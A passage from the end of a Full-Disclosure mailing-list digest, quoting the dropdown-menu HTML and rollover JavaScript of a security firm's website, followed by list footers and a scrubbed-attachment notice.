	>  function onMouseOver() { menuOn('menuServices');}
	>  function onMouseOut() { overChecker('menuServices')}
	> </script>
	>   <a href="overview.html" onmouseover="rollOn('servicesnav_4_suite','menuServices')" onmouseout="rollOff('servicesnav_4_suite','menuServices')"><img src="images/servicesnav_4_suite.gif" alt="Enterprise Protection Suite" width=179 height=18 border="0" name="servicesnav_4_suite"></a><br>
	>   <a href="services-msm.html" onmouseover="rollOn('servicesnav_4_msm','menuServices')" onmouseout="rollOff('servicesnav_4_msm','menuServices')"><img src="images/servicesnav_4_msm.gif" alt="Managed Security Monitoring" width=179 height=18 border="0" name="servicesnav_4_msm"></a><br>
	>   <a href="response.html" onmouseover="rollOn('servicesnav_4_response','menuServices')" onmouseout="rollOff('servicesnav_4_response','menuServices')"><img src="images/servicesnav_4_response.gif" alt="Active Response" width=179 height=18 border="0" name="servicesnav_4_response"></a><br>
	>   <a href="device.html" onmouseover="rollOn('servicesnav_4_device','menuServices')" onmouseout="rollOff('servicesnav_4_device','menuServices')"><img src="images/servicesnav_4_device.gif" alt="Device Management" width=179 height=18 border="0" name="servicesnav_4_device"></a><br>
	>   <a href="scanning.html" onmouseover="rollOn('servicesnav_4_scanning','menuServices')" onmouseout="rollOff('servicesnav_4_scanning','menuServices')"><img src="images/servicesnav_4_scanning.gif" alt="Managed Vulnerability Scanning" width=179 height=18 border="0" name="servicesnav_4_scanning"></a><br>
	>   <a href="consulting.html" onmouseover="rollOn('servicesnav_5_consulting','menuServices')" onmouseout="rollOff('servicesnav_5_consulting','menuServices')"><img src="images/servicesnav_5_consulting.gif" alt="Security Consulting" width=179 height=18 border="0" name="servicesnav_5_consulting"></a><br>
	>   <a href="labs.html" onmouseover="rollOn('servicesnav_5_labs','menuServices')" onmouseout="rollOff('servicesnav_5_labs','menuServices')"><img src="images/servicesnav_5_labs.gif" alt="Counterpane Labs" width=179 height=22 border="0" name="servicesnav_5_labs"></a></div>
	>
	>   <div id="menuCompany" onMouseOver="menuOn('menuCompany')" onMouseOut="overChecker('menuCompany')">
	> <script language="JavaScript">
	>  function onMouseOver() { menuOn('menuCompany');}
	>  function onMouseOut() { overChecker('menuCompany')}
	> </script>
	>   <a href="background.html" onmouseover="rollOn('companynav_4_background','menuCompany')" onmouseout="rollOff('companynav_4_background','menuCompany')"><img src="images/companynav_4_background.gif" alt="Background" width=179 height=18 border="0" name="companynav_4_background"></a><br>
	>   <a href="team.html" onmouseover="rollOn('companynav_5_team','menuCompany')" onmouseout="rollOff('companynav_5_team','menuCompany')"><img src="images/companynav_5_team.gif" alt="Our Team" width=179 height=18 border="0" name="companynav_5_team"></a><br>
	>   <a href="jobs.html" onmouseover="rollOn('companynav_4_careers','menuCompany')" onmouseout="rollOff('companynav_4_careers','menuCompany')"><img src="images/companynav_4_careers.gif" alt="Careers" width=179 height=18 border="0" name="companynav_4_careers"></a><br>
	>   <a href="investors.html" onmouseover="rollOn('companynav_4_investors','menuCompany')" onmouseout="rollOff('companynav_4_investors','menuCompany')"><img src="images/companynav_4_investors.gif" alt="Investors" width=179 height=18 border="0" name="companynav_4_investors"></a><br>
	>   <a href="partners.html" onmouseover="rollOn('companynav_5_partners','menuCompany')" onmouseout="rollOff('companynav_5_partners','menuCompany')"><img src="images/companynav_5_partners.gif" alt="Partners" width=179 height=22 border="0" name="companynav_5_partners"></a></div>
	> <!-- end of dropdown menus -->
	>
	>
	>
	>
	>
	> </body>
	> </html>
	
	
	
	--__--__--
	
	_______________________________________________
	Full-Disclosure mailing list
	Full-Disclosure@...ts.netsys.com
	http://lists.netsys.com/mailman/listinfo/full-disclosure
	
	
	End of Full-Disclosure Digest
	

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/ms-tnef
Size: 137466 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030903/55ddde63/attachment.bin

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ